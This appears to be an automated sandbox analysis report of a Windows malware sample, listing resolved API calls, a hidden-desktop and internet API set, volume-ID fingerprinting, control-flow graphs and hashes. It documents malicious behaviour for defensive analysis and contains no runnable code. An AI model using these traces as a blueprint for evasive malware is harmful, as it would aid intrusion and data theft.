                              • GetProcAddress.KERNEL32(76210000,00D16800), ref: 00E56801
                              • GetProcAddress.KERNEL32(76210000,00D169E0), ref: 00E56819
                              • GetProcAddress.KERNEL32(76210000,00D16820), ref: 00E56831
                              • GetProcAddress.KERNEL32(76210000,00D168C0), ref: 00E5684A
                              • GetProcAddress.KERNEL32(76210000,00D2DBC8), ref: 00E56862
                              • GetProcAddress.KERNEL32(76210000,00D2D9D0), ref: 00E5687A
                              • GetProcAddress.KERNEL32(76210000,00D1A6B8), ref: 00E56893
                              • GetProcAddress.KERNEL32(76210000,00D16A00), ref: 00E568AB
                              • GetProcAddress.KERNEL32(76210000,00D2DAA8), ref: 00E568C3
                              • GetProcAddress.KERNEL32(76210000,00D2DBE0), ref: 00E568DC
                              • GetProcAddress.KERNEL32(76210000,00D2DA90), ref: 00E568F4
                              • GetProcAddress.KERNEL32(76210000,00D2DAD8), ref: 00E5690C
                              • GetProcAddress.KERNEL32(76210000,00D168E0), ref: 00E56925
                              • GetProcAddress.KERNEL32(76210000,00D2DBF8), ref: 00E5693D
                              • GetProcAddress.KERNEL32(76210000,00D2DA00), ref: 00E56955
                              • GetProcAddress.KERNEL32(76210000,00D2DAC0), ref: 00E5696E
                              • GetProcAddress.KERNEL32(76210000,00D2D970), ref: 00E56986
                              • GetProcAddress.KERNEL32(76210000,00D2D988), ref: 00E5699E
                              • GetProcAddress.KERNEL32(76210000,00D2DA18), ref: 00E569B7
                              • GetProcAddress.KERNEL32(76210000,00D2D928), ref: 00E569CF
                              • GetProcAddress.KERNEL32(76210000,00D2D940), ref: 00E569E7
                              • GetProcAddress.KERNEL32(76210000,00D2DAF0), ref: 00E56A00
                              • GetProcAddress.KERNEL32(76210000,00D1FDB8), ref: 00E56A18
                              • GetProcAddress.KERNEL32(76210000,00D2D9E8), ref: 00E56A30
                              • GetProcAddress.KERNEL32(76210000,00D2DA30), ref: 00E56A49
                              • GetProcAddress.KERNEL32(76210000,00D16900), ref: 00E56A61
                              • GetProcAddress.KERNEL32(76210000,00D2D958), ref: 00E56A79
                              • GetProcAddress.KERNEL32(76210000,00D16940), ref: 00E56A92
                              • GetProcAddress.KERNEL32(76210000,00D2D9A0), ref: 00E56AAA
                              • GetProcAddress.KERNEL32(76210000,00D2DA48), ref: 00E56AC2
                              • GetProcAddress.KERNEL32(76210000,00D16A40), ref: 00E56ADB
                              • GetProcAddress.KERNEL32(76210000,00D16A80), ref: 00E56AF3
                              • LoadLibraryA.KERNEL32(00D2DB08,00E5051F), ref: 00E56B05
                              • LoadLibraryA.KERNEL32(00D2DB38), ref: 00E56B16
                              • LoadLibraryA.KERNEL32(00D2D9B8), ref: 00E56B28
                              • LoadLibraryA.KERNEL32(00D2DB50), ref: 00E56B3A
                              • LoadLibraryA.KERNEL32(00D2DB68), ref: 00E56B4B
                              • LoadLibraryA.KERNEL32(00D2DB80), ref: 00E56B5D
                              • LoadLibraryA.KERNEL32(00D2DB98), ref: 00E56B6F
                              • LoadLibraryA.KERNEL32(00D2DD90), ref: 00E56B80
                              • GetProcAddress.KERNEL32(751E0000,00D163A0), ref: 00E56B9C
                              • GetProcAddress.KERNEL32(751E0000,00D2DEE0), ref: 00E56BB4
                              • GetProcAddress.KERNEL32(751E0000,00D28A88), ref: 00E56BCD
                              • GetProcAddress.KERNEL32(751E0000,00D2DD48), ref: 00E56BE5
                              • GetProcAddress.KERNEL32(751E0000,00D164A0), ref: 00E56BFD
                              • GetProcAddress.KERNEL32(700F0000,00D1A910), ref: 00E56C1D
                              • GetProcAddress.KERNEL32(700F0000,00D16300), ref: 00E56C35
                              • GetProcAddress.KERNEL32(700F0000,00D1A550), ref: 00E56C4E
                              • GetProcAddress.KERNEL32(700F0000,00D2DDD8), ref: 00E56C66
                              • GetProcAddress.KERNEL32(700F0000,00D2DDF0), ref: 00E56C7E
                              • GetProcAddress.KERNEL32(700F0000,00D16320), ref: 00E56C97
                              • GetProcAddress.KERNEL32(700F0000,00D166C0), ref: 00E56CAF
                              • GetProcAddress.KERNEL32(700F0000,00D2DCD0), ref: 00E56CC7
                              • GetProcAddress.KERNEL32(753A0000,00D16480), ref: 00E56CE3
                              • GetProcAddress.KERNEL32(753A0000,00D165C0), ref: 00E56CFB
                              • GetProcAddress.KERNEL32(753A0000,00D2DD78), ref: 00E56D14
                              • GetProcAddress.KERNEL32(753A0000,00D2DE08), ref: 00E56D2C
                              • GetProcAddress.KERNEL32(753A0000,00D164C0), ref: 00E56D44
                              • GetProcAddress.KERNEL32(76310000,00D1A460), ref: 00E56D64
                              • GetProcAddress.KERNEL32(76310000,00D1A488), ref: 00E56D7C
                              • GetProcAddress.KERNEL32(76310000,00D2DDA8), ref: 00E56D95
                              • GetProcAddress.KERNEL32(76310000,00D16520), ref: 00E56DAD
                              • GetProcAddress.KERNEL32(76310000,00D16360), ref: 00E56DC5
                              • GetProcAddress.KERNEL32(76310000,00D1A8C0), ref: 00E56DDE
                              • GetProcAddress.KERNEL32(76910000,00D2DDC0), ref: 00E56DFE
                              • GetProcAddress.KERNEL32(76910000,00D162E0), ref: 00E56E16
                              • GetProcAddress.KERNEL32(76910000,00D28A98), ref: 00E56E2F
                              • GetProcAddress.KERNEL32(76910000,00D2DEF8), ref: 00E56E47
                              • GetProcAddress.KERNEL32(76910000,00D2DD18), ref: 00E56E5F
                              • GetProcAddress.KERNEL32(76910000,00D16380), ref: 00E56E78
                              • GetProcAddress.KERNEL32(76910000,00D16440), ref: 00E56E90
                              • GetProcAddress.KERNEL32(76910000,00D2DCB8), ref: 00E56EA8
                              • GetProcAddress.KERNEL32(76910000,00D2DD60), ref: 00E56EC1
                              • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 00E56ED7
                              • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 00E56EEE
                              • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 00E56F05
                              • GetProcAddress.KERNEL32(75B30000,00D165A0), ref: 00E56F21
                              • GetProcAddress.KERNEL32(75B30000,00D2DC28), ref: 00E56F39
                              • GetProcAddress.KERNEL32(75B30000,00D2DC10), ref: 00E56F52
                              • GetProcAddress.KERNEL32(75B30000,00D2DE20), ref: 00E56F6A
                              • GetProcAddress.KERNEL32(75B30000,00D2DD30), ref: 00E56F82
                              • GetProcAddress.KERNEL32(75670000,00D16600), ref: 00E56F9E
                              • GetProcAddress.KERNEL32(75670000,00D165E0), ref: 00E56FB6
                              • GetProcAddress.KERNEL32(76AC0000,00D166A0), ref: 00E56FD2
                              • GetProcAddress.KERNEL32(76AC0000,00D2DC40), ref: 00E56FEA
                              • GetProcAddress.KERNEL32(6F4E0000,00D16540), ref: 00E5700A
                              • GetProcAddress.KERNEL32(6F4E0000,00D16500), ref: 00E57022
                              • GetProcAddress.KERNEL32(6F4E0000,00D163C0), ref: 00E5703B
                              • GetProcAddress.KERNEL32(6F4E0000,00D2DE38), ref: 00E57053
                              • GetProcAddress.KERNEL32(6F4E0000,00D163E0), ref: 00E5706B
                              • GetProcAddress.KERNEL32(6F4E0000,00D16620), ref: 00E57084
                              • GetProcAddress.KERNEL32(6F4E0000,00D16420), ref: 00E5709C
                              • GetProcAddress.KERNEL32(6F4E0000,00D16580), ref: 00E570B4
                              • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00E570CB
                              • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00E570E2
                              • GetProcAddress.KERNEL32(75AE0000,00D2DE50), ref: 00E570FE
                              • GetProcAddress.KERNEL32(75AE0000,00D28928), ref: 00E57116
                              • GetProcAddress.KERNEL32(75AE0000,00D2DE68), ref: 00E5712F
                              • GetProcAddress.KERNEL32(75AE0000,00D2DC58), ref: 00E57147
                              • GetProcAddress.KERNEL32(76300000,00D164E0), ref: 00E57163
                              • GetProcAddress.KERNEL32(6D3F0000,00D2DE80), ref: 00E5717F
                              • GetProcAddress.KERNEL32(6D3F0000,00D16400), ref: 00E57197
                              • GetProcAddress.KERNEL32(6D3F0000,00D2DCE8), ref: 00E571B0
                              • GetProcAddress.KERNEL32(6D3F0000,00D2DE98), ref: 00E571C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                              • API String ID: 2238633743-3468015613
                              • Opcode ID: 698cee688fd7587cee6f6d788fc83881b4210ca8f90707bc74d2917b8f506946
                              • Instruction ID: ed903b5c8dbbe9d42d01bda9da1e8d79ad632f383e6e0146e507d563f2d9aa1a
                              • Opcode Fuzzy Hash: 698cee688fd7587cee6f6d788fc83881b4210ca8f90707bc74d2917b8f506946
                              • Instruction Fuzzy Hash: 086243B55143009FE774DFA4E898A2637B9F788309310891AFAD5C3B6CDB3E9850DB60
                              APIs
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E4F1D5
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F1F1
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E4F1FC
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F215
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E4F220
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F239
                              • lstrcpy.KERNEL32(00000000,00E64FA0), ref: 00E4F25E
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F28C
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F2C0
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4F2F0
                              • lstrlen.KERNEL32(00D16980), ref: 00E4F315
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: 5411a908f745bee67b80e2f08aecd1969b6c47a073af3bbcd9f8f0f83a715200
                              • Instruction ID: 040d1640a36bf42d39f5e6eff04c80e8c552dc03e406f4ff50c261c4e6ae1395
                              • Opcode Fuzzy Hash: 5411a908f745bee67b80e2f08aecd1969b6c47a073af3bbcd9f8f0f83a715200
                              • Instruction Fuzzy Hash: 04A25C70A01305DFCB20DF69E448A5ABBF4AF44718F29947DE889EB265DB36DC41CB50
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E50013
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E500BD
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E500E1
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E500EC
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E50110
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E5011B
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E5013F
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E5015A
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E50189
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E50194
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E501C3
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E501CE
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E50206
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E50250
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E50288
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E5059B
                              • lstrlen.KERNEL32(00D167A0), ref: 00E505AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E505D7
                              • lstrcat.KERNEL32(00000000,?), ref: 00E505E3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5060E
                              • lstrlen.KERNEL32(00D2F668), ref: 00E50625
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E5064C
                              • lstrcat.KERNEL32(00000000,?), ref: 00E50658
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E50681
                              • lstrlen.KERNEL32(00D166E0), ref: 00E50698
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E506C9
                              • lstrcat.KERNEL32(00000000,?), ref: 00E506D5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E50706
                              • lstrcpy.KERNEL32(00000000,00D28A78), ref: 00E5074B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E5077F
                              • lstrcpy.KERNEL32(00000000,00D2F548), ref: 00E507E7
                              • lstrcpy.KERNEL32(00000000,00D28BB8), ref: 00E50858
                              • lstrcpy.KERNEL32(00000000,fplugins), ref: 00E508CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E50928
                              • lstrcpy.KERNEL32(00000000,00D28C08), ref: 00E509F8
                                • Part of subcall function 00E324E0: lstrcpy.KERNEL32(00000000,?), ref: 00E32528
                                • Part of subcall function 00E324E0: lstrcpy.KERNEL32(00000000,?), ref: 00E3254E
                                • Part of subcall function 00E324E0: lstrcpy.KERNEL32(00000000,?), ref: 00E32577
                              • lstrcpy.KERNEL32(00000000,00D28B28), ref: 00E50ACE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E50B81
                              • lstrcpy.KERNEL32(00000000,00D28B28), ref: 00E50D58
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID: fplugins
                              • API String ID: 2500673778-38756186
                              • Opcode ID: 203e5472038257ffaa6baadc8110b91ae1706e631b56a2d563662fec859e4422
                              • Instruction ID: 500bfbb717231993536f79a925655ace50a9b1c7ca934f4c4d565ef168614165
                              • Opcode Fuzzy Hash: 203e5472038257ffaa6baadc8110b91ae1706e631b56a2d563662fec859e4422
                              • Instruction Fuzzy Hash: 7AE27F71605340CFC734DF29C488B5ABBE0BF88309F5999ADE98D9B252DB31D849CB52
                              APIs
                              • lstrlen.KERNEL32(00D16980), ref: 00E4F315
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4F3A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4F3C7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4F47B
                              • lstrcpy.KERNEL32(00000000,00D16980), ref: 00E4F4BB
                              • lstrcpy.KERNEL32(00000000,00D288E8), ref: 00E4F4EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4F59E
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E4F61C
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4F64C
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4F69A
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E4F718
                              • lstrlen.KERNEL32(00D289D8), ref: 00E4F746
                              • lstrcpy.KERNEL32(00000000,00D289D8), ref: 00E4F771
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4F793
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4F7E4
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E4FA32
                              • lstrlen.KERNEL32(00D28A18), ref: 00E4FA60
                              • lstrcpy.KERNEL32(00000000,00D28A18), ref: 00E4FA8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4FAAD
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4FAFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: 398e2a486ff04db0e40f8565688dcca1c56b38a7d489b6c23995f6d6727272e2
                              • Instruction ID: ebfe69317f7e1574d1dd8e27c149d6000b17f3cb1d0717b219b4d5c9401a3891
                              • Opcode Fuzzy Hash: 398e2a486ff04db0e40f8565688dcca1c56b38a7d489b6c23995f6d6727272e2
                              • Instruction Fuzzy Hash: 2EF15D70A01201CFDB24CF69E448A19B7F5BF44B18B29D1BED849AB765D73ADC42CB50

                              Control-flow Graph

                              Basic blocks (node id, address range, API calls) with their successor blocks:
                              • 2721 e48ca0-e48cc4 StrCmpCA -> 2722, 2723
                              • 2722 e48cc6-e48cc7 ExitProcess
                              • 2723 e48ccd-e48ce6 -> 2725, 2726
                              • 2725 e48ee2-e48eef call e32a20
                              • 2726 e48cec-e48cf1 -> 2728
                              • 2728 e48cf6-e48cf9 -> 2729, 2730
                              • 2729 e48ec3-e48edc -> 2725, 2770
                              • 2730 e48cff -> 2732, 2733, 2734, 2735, 2736, 2737, 2738, 2739, 2740, 2741, 2742, 2743, 2744
                              • 2770 e48cf3 -> 2728
                              • 2732 e48d84-e48d92 StrCmpCA -> 2729, 2758
                              • 2733 e48da4-e48db8 StrCmpCA -> 2729
                              • 2734 e48d06-e48d15 lstrlen -> 2746, 2747
                              • 2735 e48e6f-e48e7d StrCmpCA -> 2729, 2750
                              • 2736 e48e88-e48e9a lstrlen -> 2751, 2752
                              • 2737 e48e56-e48e64 StrCmpCA -> 2729, 2749
                              • 2738 e48d30-e48d3f lstrlen -> 2753, 2754
                              • 2739 e48dbd-e48dcb StrCmpCA -> 2729, 2759
                              • 2740 e48ddd-e48deb StrCmpCA -> 2729, 2760
                              • 2741 e48dfd-e48e0b StrCmpCA -> 2729, 2761
                              • 2742 e48e1d-e48e2b StrCmpCA -> 2729, 2745
                              • 2743 e48e3d-e48e4b StrCmpCA -> 2729, 2748
                              • 2744 e48d5a-e48d69 lstrlen -> 2755, 2756
                              • 2758 e48d98-e48d9f -> 2729
                              • 2746 e48d17-e48d1c call e32a20 -> 2747
                              • 2747 e48d1f-e48d2b call e32930 -> 2779
                              • 2750 e48e7f-e48e86 -> 2729
                              • 2751 e48ea4-e48eb0 call e32930 -> 2779
                              • 2752 e48e9c-e48ea1 call e32a20 -> 2751
                              • 2749 e48e66-e48e6d -> 2729
                              • 2753 e48d41-e48d46 call e32a20 -> 2754
                              • 2754 e48d49-e48d55 call e32930 -> 2779
                              • 2759 e48dd1-e48dd8 -> 2729
                              • 2760 e48df1-e48df8 -> 2729
                              • 2761 e48e11-e48e18 -> 2729
                              • 2745 e48e31-e48e38 -> 2729
                              • 2748 e48e4d-e48e54 -> 2729
                              • 2755 e48d73-e48d7f call e32930 -> 2779
                              • 2756 e48d6b-e48d70 call e32a20 -> 2755
                              • 2779 e48eb3-e48eb5 -> 2729, 2780
                              • 2780 e48eb7-e48eb9 -> 2729, 2781
                              • 2781 e48ebb-e48ebd lstrcpy -> 2729
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: a852e87df7a152b81e41159c78ad9ee7819b4858ae0cf97abb1cc859d306602c
                              • Instruction ID: 3ec9788f298a9d20d0652f7626274ed2857bdc0b2a4a1c9f9da21705d310a0c3
                              • Opcode Fuzzy Hash: a852e87df7a152b81e41159c78ad9ee7819b4858ae0cf97abb1cc859d306602c
                              • Instruction Fuzzy Hash: 85517C70A04701DFDB319F79EE88A6FBBF4BB54708F10682DE582E2650DB79E4419B21

                              Control-flow Graph

                              Basic blocks (node id, address range, API calls) with their successor blocks:
                              • 2782 e52740-e52783 GetWindowsDirectoryA -> 2783, 2784
                              • 2783 e52785 -> 2784
                              • 2784 e5278c-e527ea GetVolumeInformationA -> 2785
                              • 2785 e527ec-e527f2 -> 2786, 2787
                              • 2786 e527f4-e52807 -> 2785
                              • 2787 e52809-e52820 GetProcessHeap RtlAllocateHeap -> 2788, 2789
                              • 2788 e52826-e52844 wsprintfA -> 2790
                              • 2789 e52822-e52824 -> 2790
                              • 2790 e5285b-e52872 call e571e0
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00E5277B
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00E493B6,00000000,00000000,00000000,00000000), ref: 00E527AC
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E5280F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E52816
                              • wsprintfA.USER32 ref: 00E5283B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
